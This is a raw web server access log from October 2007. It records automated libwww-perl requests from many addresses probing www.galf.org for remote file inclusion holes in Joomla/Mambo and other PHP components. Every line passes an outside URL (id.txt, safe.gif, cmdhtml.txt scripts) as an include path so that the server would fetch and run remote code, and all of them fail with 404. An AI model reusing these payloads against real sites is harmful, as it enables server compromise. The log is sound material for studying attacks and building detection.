62.75.162.34 - - [21/Oct/2007:17:11:46 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:11:46 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:11:47 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.61.161.25 - - [21/Oct/2007:17:11:47 -0700] "GET /logs/access_070827.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.161.25 - - [21/Oct/2007:17:11:47 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:12:35 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:12:35 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://r0x00k.ExoFire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.147.211.197 - - [21/Oct/2007:17:12:37 -0700] "GET /logs/access_070826.log/index.php?go=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.209.144.56 - - [21/Oct/2007:17:12:38 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:12:47 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:12:49 -0700] "GET /logs/access_070820.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.61.161.25 - - [21/Oct/2007:17:12:49 -0700] "GET /logs/access_070820.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://stevenssharks.com/webcalendar/ws/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.172.188.64 - - [21/Oct/2007:17:12:56 -0700] "GET /logs/middle.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
217.172.188.64 - - [21/Oct/2007:17:12:56 -0700] "GET /middle.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
91.197.136.40 - - [21/Oct/2007:17:12:56 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
91.197.136.40 - - [21/Oct/2007:17:13:00 -0700] "GET /logs/access_071001.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vip-dontour.com/images/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:13:36 -0700] "GET /logs/includes/dbal.php?eqdkp_root_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.229.14.76 - - [21/Oct/2007:17:13:37 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
213.229.14.76 - - [21/Oct/2007:17:13:37 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.glt.petos.net/backupdb/kidna? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.216.236.100 - - [21/Oct/2007:17:13:37 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.74.234 - - [21/Oct/2007:17:13:40 -0700] "GET /logs/access_071008.log/voir.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.247.71.13 - - [21/Oct/2007:17:13:53 -0700] "GET /logs/access_070820.log/index1.php?=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.247.71.13 - - [21/Oct/2007:17:13:53 -0700] "GET /index1.php?=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.247.71.13 - - [21/Oct/2007:17:13:53 -0700] "GET /logs/index1.php?=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.73.180.28 - - [21/Oct/2007:17:13:55 -0700] "GET /logs/access_070826.log//modules/agendax/addevent.inc.php?agendax_path=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.192.74.234 - - [21/Oct/2007:17:13:57 -0700] "GET /logs/access_070910.log/voir.php?inc=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.205.60.84 - - [21/Oct/2007:17:14:14 -0700] "GET /includes/dbal.php?eqdkp_root_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
211.62.35.165 - - [21/Oct/2007:17:14:26 -0700] "GET /logs/access_070723.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://agatsuma.007ihost.com/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
194.126.193.82 - - [21/Oct/2007:17:15:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:15:30 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:15:30 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.194.124.84 - - [21/Oct/2007:17:15:33 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.194.124.84 - - [21/Oct/2007:17:15:33 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
213.194.124.84 - - [21/Oct/2007:17:15:39 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tryon.pagebr.com/fei/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:15:45 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:15:47 -0700] "GET //components/com_minibb.php?absolute_path=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:15:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.187.100.101 - - [21/Oct/2007:17:15:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.247.71.13 - - [21/Oct/2007:17:15:51 -0700] "GET /logs/access.log/index1.php?=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:03 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:03 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:03 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:06 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:06 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:16:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:11 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:11 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
207.58.191.155 - - [21/Oct/2007:17:16:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:16:13 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
64.21.152.2 - - [21/Oct/2007:17:16:13 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:16:16 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:16 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:16:16 -0700] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:16:17 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.171.31.19 - - [21/Oct/2007:17:16:17 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.75.225.10 - - [21/Oct/2007:17:16:20 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:16:20 -0700] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:16:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
212.43.230.20 - - [21/Oct/2007:17:16:21 -0700] "GET /logs/access_070826.log/index2.php?x=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:17:16:21 -0700] "GET /index2.php?x=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.43.230.20 - - [21/Oct/2007:17:16:22 -0700] "GET /logs/index2.php?x=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.21.152.2 - - [21/Oct/2007:17:16:23 -0700] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:25 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:30 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:30 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:16:34 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:16:34 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
65.61.166.77 - - [21/Oct/2007:17:16:34 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:38 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:38 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.181.5 - - [21/Oct/2007:17:16:42 -0700] "GET /logs/access_070826.log/side.php?table=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
87.106.181.5 - - [21/Oct/2007:17:16:42 -0700] "GET /side.php?table=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
87.106.181.5 - - [21/Oct/2007:17:16:43 -0700] "GET /logs/side.php?table=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:16:53 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.61.166.77 - - [21/Oct/2007:17:17:01 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:17:04 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [21/Oct/2007:17:17:07 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [21/Oct/2007:17:17:07 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
193.25.197.125 - - [21/Oct/2007:17:17:14 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:15 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:15 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.216.236.100 - - [21/Oct/2007:17:17:18 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:20 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:17:20 -0700] "GET /logs/access_070625.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:17:21 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:17:21 -0700] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.191.155 - - [21/Oct/2007:17:17:21 -0700] "GET /logs/access_071008.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://r0x00k.exofire.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
201.216.236.100 - - [21/Oct/2007:17:17:25 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://200.51.46.126/tiki/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:28 -0700] "GET /logs/access_070826.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:28 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:29 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.25.197.125 - - [21/Oct/2007:17:17:34 -0700] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:18:11 -0700] "GET /logs/access_070826.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.88.183.189 - - [21/Oct/2007:17:18:14 -0700] "GET /logs/access_070826.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.unkn0wn-xd.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:18:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:18:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [21/Oct/2007:17:18:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [21/Oct/2007:17:18:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.75.162.34 - - [21/Oct/2007:17:18:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.75.162.34 - - [21/Oct/2007:17:18:26 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
